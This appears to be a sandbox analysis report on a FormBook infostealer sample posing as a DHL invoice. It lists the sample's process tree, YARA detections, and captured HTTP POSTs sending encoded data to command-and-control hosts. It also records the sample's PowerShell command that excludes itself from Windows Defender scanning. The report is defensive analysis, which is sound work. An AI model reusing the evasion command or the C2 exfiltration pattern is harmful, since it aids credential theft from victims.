                                                                                Data Ascii: Y8i=y+atPIkB4rnDrqyc1Jlv0Fz8lzdj7uoRwbnKKm/FcVx1UMpy4Z3JEs+Eka2Fni0XGR247h2he2bZq2V+MbjtEVARdUGwH/AhjQAnF4ySUvUdaoQVcDLghCIAsku2faOWZEKZGLKjuB3u3sB2aBJQwXxQOrTfdc5CSKGLDnhHQCCJE3cGu7gCf8pYsJnCExTG6R/FMD+9ZPNXAMAcPOegRKWgcLcOmyUG08hjtra6Ty2S6nN3oum3+lkkNtiyzGYoWYP8GGh+NR3pujbhsgdhj3yc3Km8jF++8m2hJt+GMf1ztAhM8tLHnVfaFz83sWDgEF0cdPWZKwJnFsH21NVvG4nNPnYpAcdCPVR+WMG1KmL5tsku6s3PRh+4jqzfnHXUPacdI3xnAQLgFUURvpIEXLG93viH4/FskNIS4wZqeZY32AjT6dX7YAGBIUDPErCpJ7MgeUGd2RbL1g7UsYUtM7WBg0xEVdw+w7eM6y5thuaBxoKqdb+ZNsnhkWs9WVQX7fDAwrzLd4IY2EBGXiurOYwgh3EBix1VJ/AQFP6h05LE01dk3KV+gjPO8YPeR3WlA8MlMwvERxdkTlIPANTAcwf3S28kDfH5raPBo4RRMhD6SZX5j5vLx/Q6fU5uXAcbctx+2dG4L9kGZoa/stjV/n3zxYkIWOpKWGO7Wqokw/qZMeKaOECqlbc7tmjRSheZBEdu0F5cjzUAabqDOibk0HIakOBa12VWOEyQ+xf0O5XND42ojvl6PYp5De6Eb4i8wlBFI1INWOODncXQsKeyYW6peZceWToAAUQ3kaYUsr5tWQ3g+pArGbU4tKC1+MKRVRZ9b+JJFtuCBD/OBfsWtHPHXUg+HmvteDF2gELJKp7mRd46u9rHFedQPU/fmHFdTFLTLIpepu3ecl6Xh+B06Q67WgcM48vr9GhAleR7mrSrhwRCSpneVmC8b0fK9aYV06Hf5p5ObTbxmoVrM18VSoOphlr57sy04UTjR/Q0+uJyH30z [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                48192.168.2.4500563.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:38:55.381524086 CET502OUTGET /8hrm/?Y8i=/8yNM9wGzpX2p7Gr9OMs8k3Lkit8nMI9nKTTJBalfkMfH6xzxaryHaqGqaSFmjBUY2ej3x2hRFvFhHVuCPrBPiINYkfJGOYYxyYlLdiiR95oU5gTTm7ij0A=&gvyXe=EtxTw6OpYVppMB HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.everyone.golf
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:38:58.940800905 CET400INHTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Sun, 17 Nov 2024 07:38:58 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 260
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 59 38 69 3d 2f 38 79 4e 4d 39 77 47 7a 70 58 32 70 37 47 72 39 4f 4d 73 38 6b 33 4c 6b 69 74 38 6e 4d 49 39 6e 4b 54 54 4a 42 61 6c 66 6b 4d 66 48 36 78 7a 78 61 72 79 48 61 71 47 71 61 53 46 6d 6a 42 55 59 32 65 6a 33 78 32 68 52 46 76 46 68 48 56 75 43 50 72 42 50 69 49 4e 59 6b 66 4a 47 4f 59 59 78 79 59 6c 4c 64 69 69 52 39 35 6f 55 35 67 54 54 6d 37 69 6a 30 41 3d 26 67 76 79 58 65 3d 45 74 78 54 77 36 4f 70 59 56 70 70 4d 42 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Y8i=/8yNM9wGzpX2p7Gr9OMs8k3Lkit8nMI9nKTTJBalfkMfH6xzxaryHaqGqaSFmjBUY2ej3x2hRFvFhHVuCPrBPiINYkfJGOYYxyYlLdiiR95oU5gTTm7ij0A=&gvyXe=EtxTw6OpYVppMB"}</script></head></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                49192.168.2.4500573.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:39:04.019942999 CET760OUTPOST /ndw1/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.booosted.xyz
                                                                                Origin: http://www.booosted.xyz
                                                                                Referer: http://www.booosted.xyz/ndw1/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 54 78 53 64 56 4a 71 37 38 34 50 52 5a 6b 56 30 5a 43 4e 47 62 38 71 38 49 48 4b 6f 62 71 58 49 66 7a 6d 67 51 65 70 32 4a 47 37 4f 67 6f 59 72 7a 71 68 6b 2f 2b 59 59 33 62 4a 78 6e 51 71 39 78 4b 71 42 34 49 57 71 78 6d 2f 69 73 77 75 75 31 4c 48 48 74 2b 58 38 4c 66 5a 4c 57 63 33 69 50 50 69 6b 6b 4d 34 2b 6b 6f 61 46 77 2b 69 52 52 33 71 6b 71 47 30 59 2b 51 61 31 34 64 4c 56 76 53 31 78 35 6f 46 36 42 51 52 73 74 68 68 59 48 56 51 78 65 6e 71 47 65 66 62 39 58 75 45 45 32 6d 31 43 6d 42 50 67 35 75 37 2f 33 6b 62 61 39 37 52 42 75 51 37 6b 71 77 2f 59 4b 72 75 46 39 51 3d 3d
                                                                                Data Ascii: Y8i=TxSdVJq784PRZkV0ZCNGb8q8IHKobqXIfzmgQep2JG7OgoYrzqhk/+YY3bJxnQq9xKqB4IWqxm/iswuu1LHHt+X8LfZLWc3iPPikkM4+koaFw+iRR3qkqG0Y+Qa14dLVvS1x5oF6BQRsthhYHVQxenqGefb9XuEE2m1CmBPg5u7/3kba97RBuQ7kqw/YKruF9Q==


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                50192.168.2.4500583.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:39:06.562876940 CET780OUTPOST /ndw1/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.booosted.xyz
                                                                                Origin: http://www.booosted.xyz
                                                                                Referer: http://www.booosted.xyz/ndw1/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 54 78 53 64 56 4a 71 37 38 34 50 52 57 6c 46 30 4a 55 46 47 64 63 71 7a 4c 48 4b 6f 53 4b 58 4d 66 79 61 67 51 63 46 6d 4a 30 76 4f 68 4a 6f 72 79 76 56 6b 34 2b 59 59 2f 37 4a 30 70 77 71 36 78 4b 6e 2b 34 4e 32 71 78 6d 37 69 73 31 71 75 79 38 62 41 2f 65 58 2b 58 66 5a 4e 4c 4d 33 69 50 50 69 6b 6b 4d 45 55 6b 6f 43 46 78 4e 36 52 44 6d 71 6e 32 57 30 5a 35 51 61 31 79 39 4c 52 76 53 31 54 35 71 78 45 42 57 56 73 74 67 52 59 48 41 77 77 4e 48 71 41 61 66 61 4e 55 73 42 52 76 6c 34 49 70 44 47 47 34 2f 66 62 2f 43 4b 41 73 4b 77 57 38 51 66 58 33 33 32 73 48 6f 54 4d 6d 54 35 35 4e 5a 4b 62 35 5a 4f 72 59 39 7a 45 46 34 4b 42 31 4d 63 3d
                                                                                Data Ascii: Y8i=TxSdVJq784PRWlF0JUFGdcqzLHKoSKXMfyagQcFmJ0vOhJoryvVk4+YY/7J0pwq6xKn+4N2qxm7is1quy8bA/eX+XfZNLM3iPPikkMEUkoCFxN6RDmqn2W0Z5Qa1y9LRvS1T5qxEBWVstgRYHAwwNHqAafaNUsBRvl4IpDGG4/fb/CKAsKwW8QfX332sHoTMmT55NZKb5ZOrY9zEF4KB1Mc=


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                51192.168.2.4500593.33.130.19080
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:39:09.424566031 CET10862OUTPOST /ndw1/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.booosted.xyz
                                                                                Origin: http://www.booosted.xyz
                                                                                Referer: http://www.booosted.xyz/ndw1/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 54 78 53 64 56 4a 71 37 38 34 50 52 57 6c 46 30 4a 55 46 47 64 63 71 7a 4c 48 4b 6f 53 4b 58 4d 66 79 61 67 51 63 46 6d 4a 31 58 4f 68 37 4d 72 77 49 35 6b 35 2b 59 59 78 62 4a 31 70 77 72 2f 78 4b 76 36 34 4e 71 36 78 6b 7a 69 6a 33 69 75 33 4f 7a 41 6d 75 58 2b 63 2f 5a 49 57 63 33 4e 50 50 53 37 6b 4e 34 55 6b 6f 43 46 78 50 4f 52 54 48 71 6e 6d 6d 30 59 2b 51 61 35 34 64 4c 35 76 53 73 75 35 71 30 78 43 6c 64 73 71 41 42 59 41 7a 59 77 4f 6e 71 43 64 66 61 56 55 74 38 42 76 6c 55 71 70 43 7a 6a 34 38 44 62 36 55 44 36 37 49 34 35 76 44 6a 4b 70 33 69 62 4d 70 50 4e 2f 69 4e 66 41 4b 75 59 74 37 6d 6e 51 61 4b 70 66 5a 4b 42 67 4c 57 4d 41 50 2b 4f 71 51 66 32 34 77 37 51 68 47 59 41 55 43 4a 34 65 61 57 38 79 38 46 69 6f 33 69 37 36 32 47 46 50 61 52 76 72 41 78 61 45 4b 63 6a 6f 56 49 77 61 36 78 6b 53 50 6c 48 38 41 47 72 79 70 5a 52 6e 78 36 31 6e 36 47 2b 4b 34 73 41 69 77 59 73 55 6b 46 67 63 37 6b 4a 67 4e 51 2f 48 59 66 63 7a 71 48 69 57 47 55 61 4f 78 47 72 7a 57 58 67 44 44 [TRUNCATED]
                                                                                Data Ascii: Y8i=TxSdVJq784PRWlF0JUFGdcqzLHKoSKXMfyagQcFmJ1XOh7MrwI5k5+YYxbJ1pwr/xKv64Nq6xkzij3iu3OzAmuX+c/ZIWc3NPPS7kN4UkoCFxPORTHqnmm0Y+Qa54dL5vSsu5q0xCldsqABYAzYwOnqCdfaVUt8BvlUqpCzj48Db6UD67I45vDjKp3ibMpPN/iNfAKuYt7mnQaKpfZKBgLWMAP+OqQf24w7QhGYAUCJ4eaW8y8Fio3i762GFPaRvrAxaEKcjoVIwa6xkSPlH8AGrypZRnx61n6G+K4sAiwYsUkFgc7kJgNQ/HYfczqHiWGUaOxGrzWXgDDQm8lrkqJPt9WuZeb7WRB/fqDcxPtfx0Mqc6d2RpJYe/KnpLkf6CN/Xd4430OIsoDPtj6H2HPx+5Ue7L7/asY/BwRw+gYpTS+LrAyJBdXMQtIxcZr6Ek3dV18ynM5xpG25M+tJSngkNiTJUS3Au3ZIdPsVV0XRHqVE3Gery3DvvCVqjsQcL43ZLwdlipvjWO25Z3ddBJX844yGF+28fQlDzeIJOu1mhEQ1EpCwM3zxO0Bb4bQVx/HTUCIYDMEUBOwbnyymbBcG9LlQdX/X67AZRt5FEfDZWkCHgoS8gy0+sHGMjuQh1u+OAq8vxBN3g87PRTX2DVKHYajGh2qhCxcCGRcydS10zoB+89J6iKXAPt/cVU1PIRbF2JXRdqFlu1cvwxwDL6/P9rKfi68h2haJx9JIOLKKM75eGrI4xmaTk0VEd14jO0g13CTo8WsEzcpfWxh6kqaEQXYzjuKKqWPkA5/lHgelaMqZBhZP4Q6O0qxCbG9u0mSGH1ShTevdpk+Ck1IWv0YyABGstLtpSHqUhzOKLuwYx8F2FTrrRWcZ384AatBb9UQA1a47h8sRTmimgCOh3RxJCN+hsMU0chksRepgVOKfNbHFFJjiqc/jjVO5S+lhyCnOJM7ECozzW221D7CKK2cvNib/4dkLQHm65OQmrasu7K8EU [TRUNCATED]


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:02:35:00
                                                                                Start date:17/11/2024
                                                                                Path:C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe"
                                                                                Imagebase:0x2b47a1c0000
                                                                                File size:3'359'817 bytes
                                                                                MD5 hash:0DF139FA0F5D3A83ECFF651FDD692C68
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:1
                                                                                Start time:02:35:02
                                                                                Start date:17/11/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:2
                                                                                Start time:02:35:02
                                                                                Start date:17/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:3
                                                                                Start time:02:35:02
                                                                                Start date:17/11/2024
                                                                                Path:C:\Windows\regedit.exe
                                                                                Wow64 process (32bit):
                                                                                Commandline:"C:\Windows\regedit.exe"
                                                                                Imagebase:
                                                                                File size:370'176 bytes
                                                                                MD5 hash:999A30979F6195BF562068639FFC4426
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:4
                                                                                Start time:02:35:02
                                                                                Start date:17/11/2024
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                Imagebase:0xd00000
                                                                                File size:2'141'552 bytes
                                                                                MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2075004528.0000000005600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2075004528.0000000005600000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2075245562.0000000005A60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2075245562.0000000005A60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:7
                                                                                Start time:02:35:03
                                                                                Start date:17/11/2024
                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 6540 -s 1348
                                                                                Imagebase:0x7ff7e69f0000
                                                                                File size:570'736 bytes
                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:8
                                                                                Start time:02:35:06
                                                                                Start date:17/11/2024
                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                Imagebase:0x7ff693ab0000
                                                                                File size:496'640 bytes
                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:12
                                                                                Start time:02:35:33
                                                                                Start date:17/11/2024
                                                                                Path:C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe"
                                                                                Imagebase:0x1e0000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4140287170.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4140287170.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:13
                                                                                Start time:02:35:34
                                                                                Start date:17/11/2024
                                                                                Path:C:\Windows\SysWOW64\wextract.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\SysWOW64\wextract.exe"
                                                                                Imagebase:0xdf0000
                                                                                File size:136'192 bytes
                                                                                MD5 hash:B9CC7E24DB7DE2E75678761B1D8BAC3E
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4140267279.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4140267279.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:14
                                                                                Start time:02:35:47
                                                                                Start date:17/11/2024
                                                                                Path:C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe"
                                                                                Imagebase:0x1e0000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4142164546.0000000005360000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4142164546.0000000005360000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:15
                                                                                Start time:02:35:59
                                                                                Start date:17/11/2024
                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                Imagebase:0x7ff6bf500000
                                                                                File size:676'768 bytes
                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Executed Functions

                                                                                  Function 00007FFD9B960050 Relevance: 2.3, Instructions: 2265COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854634582.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b960000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 78edef94c622c30e79be2f1ab011b8d1aefa7dd6f3891e2d0f543250cd01166e
                                                                                  • Instruction ID: 6de72f9bf785ec59a12799b9931337d8ec57b52f470e9229e1255ac22a09d635
                                                                                  • Opcode Fuzzy Hash: 78edef94c622c30e79be2f1ab011b8d1aefa7dd6f3891e2d0f543250cd01166e
                                                                                  • Instruction Fuzzy Hash: F4E26B71A1F7C99FE766CB6888E55A47FE0EF56300F0A05FAD089CB1A7DA186906C341
                                                                                  Function 00007FFD9B891D10 Relevance: 2.0, Strings: 1, Instructions: 738COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: d
                                                                                  • API String ID: 0-2564639436
                                                                                  • Opcode ID: 6ea24d4430f5a172bae467628327791b03ec6cbf19579b4bccc0457ddc22c380
                                                                                  • Instruction ID: 424d159879b485c7e3bf90c0f5f0ab34179ad807bf32e32fca051bf281629ba4
                                                                                  • Opcode Fuzzy Hash: 6ea24d4430f5a172bae467628327791b03ec6cbf19579b4bccc0457ddc22c380
                                                                                  • Instruction Fuzzy Hash: 67228731B1DA4D4FEB2DDB6898A15717BE0EF59310B1542BAD45EC71ABDE28F8438380
                                                                                  Function 00007FFD9B89D6C5 Relevance: 1.9, Instructions: 1866COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8061e672c4125038a951971c1a235b633779a253bea1b330904177479137d572
                                                                                  • Instruction ID: 63cb9cd78c94a21d025eb358fb440eead9a2d6af7e17eaca0866a7db7744dd77
                                                                                  • Opcode Fuzzy Hash: 8061e672c4125038a951971c1a235b633779a253bea1b330904177479137d572
                                                                                  • Instruction Fuzzy Hash: 04C29C3070DB494FDB29DB28C4A04B5BBE1FF99301B1545BEE48AC72A6DE34E946C781
                                                                                  Function 00007FFD9B892E80 Relevance: 1.3, Instructions: 1256COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 10f8a5b76522fa4a48025f306d7599b951a05130b19b9f78ee2ce340e9ff707a
                                                                                  • Instruction ID: 7fc4587ec0eaa3ee4b1971f6335ef81d6e519f2020fec5e2ddc3e3229ed0cffd
                                                                                  • Opcode Fuzzy Hash: 10f8a5b76522fa4a48025f306d7599b951a05130b19b9f78ee2ce340e9ff707a
                                                                                  • Instruction Fuzzy Hash: 83927931A0E64E4FE769CB64C4606B477D1EF99310F0541BDD48ECB9E3DE28AA46C790
                                                                                  Function 00007FFD9B897470 Relevance: .9, Instructions: 915COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e7beb94bcd9b4ba87cd2fe3cef273239ff78828ef010cac18af38b49776759e6
                                                                                  • Instruction ID: b542fd81c6e114a56439eab978aa0add1e2bcf75fbcc9f366b79af50c1a896ad
                                                                                  • Opcode Fuzzy Hash: e7beb94bcd9b4ba87cd2fe3cef273239ff78828ef010cac18af38b49776759e6
